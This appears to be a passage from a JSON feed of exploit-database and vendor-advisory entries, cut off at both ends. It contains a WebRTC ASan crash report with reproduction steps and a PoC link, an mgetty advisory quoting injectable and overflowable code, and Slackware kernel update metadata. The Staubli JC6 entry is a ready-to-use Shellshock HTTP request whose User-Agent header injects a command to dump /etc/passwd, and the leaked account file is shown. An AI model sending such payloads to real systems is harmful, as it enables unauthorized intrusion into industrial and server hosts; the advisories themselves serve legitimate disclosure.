webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1321:36\r\n #8 0x55e01a232300 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1361:10\r\n #9 0x55e01a95d341 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) third_party/webrtc/media/engine/webrtcvideoengine.cc:1441:26\r\n #10 0x55e01a1d8dc2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) third_party/webrtc/pc/channel.cc\r\n #11 0x55e01a1f6760 in rtc::AsyncInvoker::OnMessage(rtc::Message*) third_party/webrtc/rtc_base/asyncinvoker.cc:45:22\r\n #12 0x55e01a0a6aa1 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) jingle/glue/thread_wrapper.cc:157:22\r\n #13 0x55e01a0a7d7e in jingle_glue::JingleThreadWrapper::RunTask(int) jingle/glue/thread_wrapper.cc:279:7\r\n #14 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #15 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #16 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25\r\n #17 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5\r\n #18 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373\r\n #19 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31\r\n #20 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14\r\n #21 0x55e00d6878b4 in base::Thread::ThreadMain() base/threading/thread.cc:337:3\r\n #22 0x55e00d73c694 in base::(anonymous namespace)::ThreadFunc(void*) base/threading/platform_thread_posix.cc:76:13\r\n #23 0x7fa3d586f493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)\r\n \r\nThread T15 (Chrome_libJingl) created by T0 (chrome) here:\r\n #0 0x55e00603bb7d in __interceptor_pthread_create /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors.cc:210:3\r\n #1 0x55e00d73b99e in base::(anonymous namespace)::CreateThread(unsigned long, bool, base::PlatformThread::Delegate*, base::PlatformThreadHandle*, base::ThreadPriority) base/threading/platform_thread_posix.cc:115:13\r\n #2 0x55e00d686be9 in base::Thread::StartWithOptions(base::Thread::Options const&) base/threading/thread.cc:112:15\r\n #3 0x55e00d68684b in base::Thread::Start() base/threading/thread.cc:75:10\r\n #4 0x55e01a09ba37 in content::PeerConnectionDependencyFactory::CreatePeerConnectionFactory() content/renderer/media/webrtc/peer_connection_dependency_factory.cc:177:3\r\n #5 0x55e01a09b4d0 in content::PeerConnectionDependencyFactory::GetPcFactory() content/renderer/media/webrtc/peer_connection_dependency_factory.cc:139:5\r\n #6 0x55e01a09df09 in content::PeerConnectionDependencyFactory::CreatePeerConnection(webrtc::PeerConnectionInterface::RTCConfiguration const&, blink::WebLocalFrame*, webrtc::PeerConnectionObserver*) content/renderer/media/webrtc/peer_connection_dependency_factory.cc:340:8\r\n #7 0x55e01aa63b1b in content::RTCPeerConnectionHandler::Initialize(blink::WebRTCConfiguration const&, blink::WebMediaConstraints const&) content/renderer/media/webrtc/rtc_peer_connection_handler.cc:1333:50\r\n #8 0x55e01baafde2 in blink::RTCPeerConnection::RTCPeerConnection(blink::ExecutionContext*, blink::WebRTCConfiguration const&, blink::WebMediaConstraints, blink::ExceptionState&) third_party/blink/renderer/modules/peerconnection/rtc_peer_connection.cc:585:23\r\n #9 0x55e01baaaedc in blink::RTCPeerConnection::Create(blink::ExecutionContext*, blink::RTCConfiguration const&, blink::Dictionary const&, blink::ExceptionState&) third_party/blink/renderer/modules/peerconnection/rtc_peer_connection.cc:518:44\r\n #10 0x55e01bb1ad0b in constructor gen/third_party/blink/renderer/bindings/modules/v8/v8_rtc_peer_connection.cc:1317:29\r\n #11 0x55e01bb1ad0b in blink::V8RTCPeerConnection::constructorCallback(v8::FunctionCallbackInfo<v8::Value> const&) gen/third_party/blink/renderer/bindings/modules/v8/v8_rtc_peer_connection.cc:1667\r\n #12 0x55e00ab4db49 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo*) v8/src/api-arguments-inl.h:94:3\r\n #13 0x55e00ab4a4c4 in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<true>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) v8/src/builtins/builtins-api.cc:109:36\r\n #14 0x55e00ab48eb3 in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) v8/src/builtins/builtins-api.cc:135:5\r\n #15 0x55e00c2fce0d (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xde74e0d)\r\n #16 0x55e00c263d3f (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddbd3f)\r\n #17 0x7e9c7b70dd69 (<unknown module>)\r\n #18 0x7e9c7b68868f (<unknown module>)\r\n #19 0x55e00c2618a5 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xddd98a5)\r\n #20 0x55e00c263c60 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddbc60)\r\n #21 0x7e9c7b70dd69 (<unknown module>)\r\n #22 0x7e9c7b68868f (<unknown module>)\r\n #23 0x7e9c7b68868f (<unknown module>)\r\n #24 0x7e9c7b68868f (<unknown module>)\r\n #25 0x55e00c2618a5 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xddd98a5)\r\n #26 0x55e00c265722 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddd722)\r\n #27 0x7e9c7b684820 (<unknown module>)\r\n #28 0x55e00b3b4130 in Call v8/src/simulator.h:113:12\r\n #29 0x55e00b3b4130 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) v8/src/execution.cc:155\r\n #30 0x55e00b3b3993 in CallInternal v8/src/execution.cc:191:10\r\n #31 0x55e00b3b3993 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) v8/src/execution.cc:202\r\n #32 0x55e00aa107b4 in v8::Function::Call(v8::Local<v8::Context>, v8::Local<v8::Value>, int, v8::Local<v8::Value>*) v8/src/api.cc:5218:7\r\n #33 0x55e015fe0a61 in blink::V8ScriptRunner::CallFunction(v8::Local<v8::Function>, blink::ExecutionContext*, v8::Local<v8::Value>, int, v8::Local<v8::Value>*, v8::Isolate*) third_party/blink/renderer/bindings/core/v8/v8_script_runner.cc:386:17\r\n #34 0x55e016028398 in blink::V8EventListener::CallListenerFunction(blink::ScriptState*, v8::Local<v8::Value>, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_event_listener.cc:115:8\r\n #35 0x55e016029a54 in blink::V8AbstractEventListener::InvokeEventHandler(blink::ScriptState*, blink::Event*, v8::Local<v8::Value>) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:171:20\r\n #36 0x55e01602942b in blink::V8AbstractEventListener::HandleEvent(blink::ScriptState*, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:120:3\r\n #37 0x55e016029103 in blink::V8AbstractEventListener::handleEvent(blink::ExecutionContext*, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:108:3\r\n #38 0x55e017446ebe in blink::EventTarget::FireEventListeners(blink::Event*, blink::EventTargetData*, blink::HeapVector<blink::RegisteredEventListener, 1ul>&) third_party/blink/renderer/core/dom/events/event_target.cc:804:15\r\n #39 0x55e017445121 in blink::EventTarget::FireEventListeners(blink::Event*) third_party/blink/renderer/core/dom/events/event_target.cc:656:29\r\n #40 0x55e017444d5b in blink::EventTarget::DispatchEventInternal(blink::Event*) third_party/blink/renderer/core/dom/events/event_target.cc:560:41\r\n #41 0x55e017a0de87 in Create third_party/blink/renderer/core/events/progress_event.h:44:16\r\n #42 0x55e017a0de87 in blink::FileReader::FireEvent(WTF::AtomicString const&) third_party/blink/renderer/core/fileapi/file_reader.cc:471\r\n #43 0x55e017a0e6d4 in blink::FileReader::DidFinishLoading() third_party/blink/renderer/core/fileapi/file_reader.cc:427:3\r\n #44 0x55e00a9494ef in blink::mojom::blink::BlobReaderClientStubDispatch::Accept(blink::mojom::blink::BlobReaderClient*, mojo::Message*) gen/third_party/blink/public/mojom/blob/blob.mojom-blink.cc:168:13\r\n #45 0x55e00ea14f7e in mojo::InterfaceEndpointClient::HandleValidatedMessage(mojo::Message*) mojo/public/cpp/bindings/lib/interface_endpoint_client.cc:419:32\r\n #46 0x55e00ea258b3 in mojo::internal::MultiplexRouter::ProcessIncomingMessage(mojo::internal::MultiplexRouter::MessageWrapper*, mojo::internal::MultiplexRouter::ClientCallBehavior, base::SequencedTaskRunner*) mojo/public/cpp/bindings/lib/multiplex_router.cc:865:42\r\n #47 0x55e00ea2409e in mojo::internal::MultiplexRouter::Accept(mojo::Message*) mojo/public/cpp/bindings/lib/multiplex_router.cc:589:38\r\n #48 0x55e00ea0efa7 in mojo::Connector::ReadSingleMessage(unsigned int*) mojo/public/cpp/bindings/lib/connector.cc:443:51\r\n #49 0x55e00ea1081c in mojo::Connector::ReadAllAvailableMessages() mojo/public/cpp/bindings/lib/connector.cc:472:10\r\n #50 0x55e00ea00642 in Run base/callback.h:125:12\r\n #51 0x55e00ea00642 in mojo::SimpleWatcher::OnHandleReady(int, unsigned int, mojo::HandleSignalsState const&) mojo/public/cpp/system/simple_watcher.cc:274\r\n #52 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #53 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #54 0x55e00c4afc95 in base::sequence_manager::internal::ThreadControllerImpl::DoWork(base::sequence_manager::internal::ThreadControllerImpl::WorkType) third_party/blink/renderer/platform/scheduler/base/thread_controller_impl.cc:166:21\r\n #55 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #56 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #57 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25\r\n #58 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5\r\n #59 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373\r\n #60 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31\r\n #61 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14\r\n #62 0x55e01bfb0599 in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:218:23\r\n #63 0x55e00cafbca5 in content::RunZygote(content::ContentMainDelegate*) content/app/content_main_runner_impl.cc:567:14\r\n #64 0x55e00caff751 in content::ContentMainRunnerImpl::Run() content/app/content_main_runner_impl.cc:969:10\r\n #65 0x55e00cb1e6c3 in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:459:29\r\n #66 0x55e00cafa2d0 in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10\r\n #67 0x55e006081fe3 in ChromeMain chrome/app/chrome_main.cc:101:12\r\n #68 0x7fa3ceac32b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:615:34 in XorPayloads\r\nShadow bytes around the buggy address:\r\n 0x0c3680767f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c3680767fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa\r\n 0x0c3680767ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c3680768000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c3680768010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c3680768020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c3680768030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n Shadow gap: cc\r\n==109993==ABORTING\r\n \r\nTo reproduce this issue:\r\n \r\n1) Apply new.patch to a fresh WebRTC tree\r\n2) Build video_replay\r\n3) Download the attached files and run ./video_replay --input_file fec\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45444.zip\n\n# 0day.today [2018-09-22] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31144"}, {"lastseen": "2018-09-22T13:47:16", "references": [], "description": "Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability.", "edition": 1, "reporter": "t4rkd3vilz", "published": "2018-09-22T00:00:00", "title": "Staubli Jacquard Industrial System JC6 Shellshock Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6271"], "modified": "2018-09-22T00:00:00", "id": "1337DAY-ID-31147", "href": "https://0day.today/exploit/description/31147", "sourceData": "# Exploit Title: Staubli Jacquard Industrial System | GNU Bash Environment\r\nVariable Handling Code Injection (Shellshock)\r\n# Exploit Author: t4rkd3vilz\r\n# Vendor Homepage: https://www.staubli.com\r\n# Software Link:\r\nhttps://www.staubli.com/tr-tr/textile/textile-machinery-solutions/\r\n# Version:JC6\r\n# CVE: CVE-2014-6271\r\n# Tested on: Linux\r\n\r\n----------------------------#PoC#----------------------------\r\n\r\n--------------> Request\r\n\r\nGET / HTTP/1.1 Host: TargetIP User-Agent: () { test;};echo \\\"Content-type:\r\ntext/plain\\\"; echo; echo; echo $(</etc/passwd) Pragma: no-cache Accept:\r\nimage/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\n\r\n--------------> Response\r\n\r\n<html>\r\n <head>\r\n <meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf8\">\r\n <link href=\"/staubli.css\" rel=\"stylesheet\" type=\"text/css\">\r\n <title>root:!:0:0::/:/usr/bin/ksh daemon:!:1:1::/etc: bin:!:2:2::/bin:\r\nsys:!:3:3::/usr/sys: adm:!:4:4::/var/adm: uucp:!:5:5::/usr/lib/uucp:\r\nguest:!:100:100::/home/guest: nobody:!:4294967294:4294967294::/:\r\nlpd:!:9:4294967294::/: lp:*:11:11::/var/spool/lp:/bin/false\r\ninvscout:*:200:1::/var/adm/invscout:/usr/bin/ksh nuucp:*:6:5:uucp login\r\nuser:/var/spool/uucppublic:/usr/sbin/uucp/uucico\r\npaul:!:201:1::/home/paul:/usr/bin/ksh jdoe:*:202:1:John\r\nDoe:/home/jdoe:/usr/bin/ksh</title>\r\n </head>\r\n <frameset rows=\"10%,90%\" border=0>\r\n <frameset cols=\"25%,75%\" border=0>\r\n <frame src=\"logo.html\" name=\"logo\" scrolling=\"no\">\r\n <frame src=\"/cgi-bin/title.cgi\" name=\"title\">\r\n </frameset>\r\n <frameset cols=\"25%,75%\" border=0>\r\n <frame src=\"menu_main.shtml\" name=\"menu\">\r\n <frame src=\"main.shtml\" name=\"main\">\r\n </frameset>\r\n </frameset>\r\n <noframe>\r\n <body id=\"main\">\r\n Sorry your navigator doesn't accept frame.\r\n </body>\r\n </noframe>\r\n</html>\n\n# 0day.today [2018-09-22] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/31147"}, {"lastseen": "2018-09-22T13:47:29", "references": [], "description": "mgetty version 1.2.0 suffers from buffer overflow, code execution, and various other privilege escalation related vulnerabilities.", "edition": 1, "reporter": "Eric Sesterhenn", "published": "2018-09-21T00:00:00", "title": "mgetty 1.2.0 Buffer Overflow / Privilege Escalation Vulnerabilities", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-16743", "CVE-2018-16744", "CVE-2018-16742", "CVE-2018-16745", "CVE-2018-16741"], "modified": "2018-09-21T00:00:00", "id": "1337DAY-ID-31142", "href": "https://0day.today/exploit/description/31142", "sourceData": "Multiple Vulnerabilities in mgetty\r\n==================================\r\n\r\n\r\nOverview\r\n- --------\r\nConfirmed Affected Versions: 1.2.0\r\nPatched Versions: 1.2.1\r\nVendor: mgetty\r\nVendor URL: http://mgetty.greenie.net\r\nCredit: X41 D-Sec GmbH, Eric Sesterhenn\r\nStatus: Public\r\nAdvisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-007-mgetty\r\n\r\n\r\nSummary and Impact\r\n- ------------------\r\nMultiple issues have been identified in the mgetty fax software. These\r\nmight be used by local users to elevate their privileges.\r\nX41 did not perform a full test or audit on the software.\r\n\r\n\r\nProduct Description\r\n- -------------------\r\n- From the vendor: For those of you that do not know mgetty+sendfax yet:\r\nit's a reliable and proven fax send and receive solution for unix and\r\nLinux. But it can do much more... so read the docs and be surprised.\r\n\r\nShell injection via faxq-helper\r\n===============================\r\nSeverity Rating: Medium\r\nVector: Fax Job\r\nCVE: CVE-2018-16741\r\nCWE: 78\r\nCVSS Score: 6.1\r\nCVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N\r\nIn fax/faxq-helper.c function do_activate(), not all characters are\r\nproperly sanitized to prevent command injection. It is possible to use\r\n||, && or > to change the control flow.\r\n\r\n{% highlight c %}\r\n /* replace all quote characters, backslash and ';' by '' */\r\n for( q = buf; *q != '\\0'; q++ )\r\n {\r\n if ( *q == '\\'' || *q == '\"' || *q == '`' ||\r\n *q == '\\' || *q == ';' )\r\n { *q = ''; }\r\n }\r\n{% endhighlight %}\r\n\r\nA job file containing malicious input can be constructed using\r\nfaxq-helper activate <jobid>. One faxrunq is started, the code is\r\nexecuted as the user running the command.\r\n\r\n{% highlight bash %}\r\n /* replace all quote characters, backslash and ';' by '' */\r\n # \" ' \\ $ ;\r\n command=tr -d '\\042\\047\\140\\134\\044\\073' <JOB | \\\r\n $AWK 'BEGIN { phone=\"-\"; flags=\"\"; pages=\"\" }\r\n $1==\"phone\" { phone=$2 }\r\n $1==\"header\" { flags=flags\" -h \"$2 }\r\n $1==\"poll\" { flags=flags\" -p\" }\r\n $1==\"normalres\" { flags=flags\" -n\" }\r\n $1==\"accthandle\" { flags=flags\" -A\r\n\\\"\"substr($0,13)\"\\\"\" }\r\n $1==\"pages\" { for( i=2; i<=NF; i++) pages=pages$i\" \" }\r\n END { printf \"'\"$FAXSENDER\"' -v%s %s %s\", \\\r\n flags, phone, pages }' -`\r\n\r\n\r\nexecute faxsend command\r\n=======================\r\n$echo \"$command\"\r\n\r\neval $command\r\n{% endhighlight %}\r\n\r\n\r\nStack Based Buffer Overflow With Long Username in\r\ncontrib/next-login/login.c\r\n============================================================================\r\nSeverity Rating: Low\r\nVector: Command Line Parameter\r\nCVE: CVE-2018-16743\r\nCWE: 121\r\nCVSS Score: 2.9\r\nCVSS Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N\r\nIn file contrib/next-login/login.c the command line parameter username\r\nis passed unsanitized to strcpy(), which causes a stack based buffer\r\noverflow if too long.\r\n\r\n{% highlight c %}\r\n char tbuf[MAXPATHLEN + 2], tname[sizeof(PATHTTY) + 10];\r\n...\r\n if (*argv) {\r\n username = *argv;\r\n ask = 0;\r\n...\r\n if (failures && strcmp(tbuf, username)) {\r\n if (failures > (pwd ? 0 : 1))\r\n badlogin(tbuf);\r\n failures = 0;\r\n }\r\n (void)strcpy(tbuf, username);\r\n{% endhighlight %}\r\n\r\n\r\nStack Based Buffer Overflow With Long Argument in contrib/scrts.c\r\n=================================================================\r\nSeverity Rating: Low\r\nVector: Command Line Parameter\r\nCVE: CVE-2018-16742\r\nCWE: 121\r\nCVSS Score: 2.9\r\nCVSS Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N\r\nIn file contrib/scrts.c a stack buffer overflow can be triggered via\r\ncommand line parameter.\r\n\r\n{% highlight c %}\r\nint main( int argc, char ** argv )\r\n{\r\nint i, fd;\r\nstruct termios tio;\r\nchar device[1000];\r\n\r\nfor ( i=1; i<argc; i++ )\r\n\r\n{\r\n\r\n if ( strchr( argv[i], '/' ) == NULL )\r\n\r\n sprintf( device, \"/dev/%s\", argv[i] );\r\n\r\n else\r\n\r\n strcpy( device, argv[i] );\r\n{% endhighlight %}\r\n\r\n\r\nStack Based Buffer Overflow and Command injection in faxrec.c\r\n=============================================================\r\nSeverity Rating: Low\r\nVector: Command Line Parameter\r\nCVE: CVE-2018-16744 (for command injection), CVE-2018-16745 (for overflow)\r\nCWE: 121\r\nCVSS Score: 2.9\r\nCVSS Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N\r\nIn file faxrec.c function fax_notify_mail(), the mail_to parameter is\r\nnot sanitized. It could allow for command injection or a buffer\r\noverflow if it is too long. If is called from facrec() which in turn\r\nis called from main() in mgetty.c. Since the notify_mail parameter is\r\na configuration parameter, it should only be possible to set it from\r\ntrusted source. If mgetty would be used with e.g. a webfront end, this\r\nmight be abused for a privilege escalation.\r\n\r\n{% highlight c %}\r\nvoid faxnotifymail P3( (pagenum, ppagenum, mailto),\r\n int pagenum, int ppagenum, char * mailto )\r\n{\r\nFILE * pipefp;\r\nchar * filename, * p;\r\nchar buf[256];\r\nint r;\r\ntimet ti;\r\n lprintf( LNOISE, \"faxnotifymail: sending mail to: %s\", mailto );\r\n sprintf( buf, \"%s %s >/dev/null 2>&1\", MAILER, mailto );\r\n pipefp = popen( buf, \"w\" );\r\n{% endhighlight %}\r\n\r\n\r\nEndless loop in g3/g32pbm.c\r\n===========================\r\nWhen converting g32 files using g3/g32pbm.c, an endless loop can be\r\ntriggered by malformed input file. Example can be found at\r\nfiles/g32pmbinfiniteloop.\r\n\r\nOut Of Bounds Access in g3/pbm2g3.c\r\n===================================\r\nWhen converting pbm files using g3/pbm2g3.c, out of bounds accesses\r\ncan occur with malformed input files in putwhitespan(). An example can\r\nbe found with files/pbm2g2oobaccess.\r\n\r\n{% highlight c %}\r\n putcode( twhite[l].bitcode, twhite[l].bitlength );\r\n{% endhighlight %}\r\n\r\n\r\nWorkaround\r\n- ----------\r\nNone.\r\n\r\n\r\nTimeline\r\n- --------\r\n2018-06-07 Issues found\r\n2018-08-27 Issue reported to vendor\r\n2018-08-28 Vendor reply\r\n2018-09-08 Vendors sends patches\r\n2018-09-08 CVE IDs requested\r\n2018-09-09 CVE IDs assigned\r\n2018-09-11 Patched Version released\r\n2018-09-11 Advisory released\n\n# 0day.today [2018-09-22] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31142"}], "slackware": [{"lastseen": "2018-09-21T23:17:59", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157_smp", "arch": "i686", "packageFilename": "kernel-modules-smp-4.4.157_smp-i686-1.txz", "packageName": "kernel-modules-smp", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157", "arch": "x86_64", "packageFilename": "kernel-modules-4.4.157-x86_64-1.txz", "packageName": "kernel-modules", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157_smp", "arch": "x86", "packageFilename": "kernel-headers-4.4.157_smp-x86-1.txz", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157", "arch": "i586", "packageFilename": "kernel-generic-4.4.157-i586-1.txz", "packageName": "kernel-generic", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157", "arch": "i586", "packageFilename": "kernel-huge-4.4.157-i586-1.txz", "packageName": "kernel-huge", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "20180913_44d4fca", "arch": "noarch", "packageFilename": "kernel-firmware-20180913_44d4fca-noarch-1.txz", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "20180913_44d4fca", "arch": "noarch", "packageFilename": "kernel-firmware-20180913_44d4fca-noarch-1.txz", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157_smp", "arch": "i686", "packageFilename": "kernel-generic-smp-4.4.157_smp-i686-1.txz", "packageName": "kernel-generic-smp", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157", "arch": "noarch", "packageFilename": "kernel-source-4.4.157-noarch-1.txz", "packageName": "kernel-source", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157", "arch": "x86_64", "packageFilename": "kernel-generic-4.4.157-x86_64-1.txz", "packageName": "kernel-generic", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157_smp", "arch": "noarch", "packageFilename": "kernel-source-4.4.157_smp-noarch-1.txz", "packageName": "kernel-source", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157", "arch": "x86", "packageFilename": "kernel-headers-4.4.157-x86-1.txz", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157", "arch": "x86_64", "packageFilename": "kernel-huge-4.4.157-x86_64-1.txz", "packageName": "kernel-huge", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157_smp", "arch": "i686", "packageFilename": "kernel-huge-smp-4.4.157_smp-i686-1.txz", "packageName": "kernel-huge-smp", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "4.4.157", "arch": "i586", "packageFilename": "kernel-modules-4.4.157-i586-1.txz", "packageName": "kernel-modules", "operator": "lt"}], "description": "New kernel packages are available for Slackware 14.2 to fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/linux-4.4.157/*: Upgraded.\n This kernel removes the unnecessary vmacache_flush_all code which could have\n led to a use-after-free situation and potentially local privilege escalation.\n In addition, it fixes some regressions which may have led to diminished X\n performance.\n Be sure to upgrade your initrd after upgrading the kernel packages.\n If you use lilo to boot your machine, be sure lilo.conf points to the correct\n kernel and initrd and run lilo as root to update the bootloader.\n If you use elilo to boot your machine, you should run eliloconfig to copy the\n kernel and initrd to the EFI System Partition.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17182\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 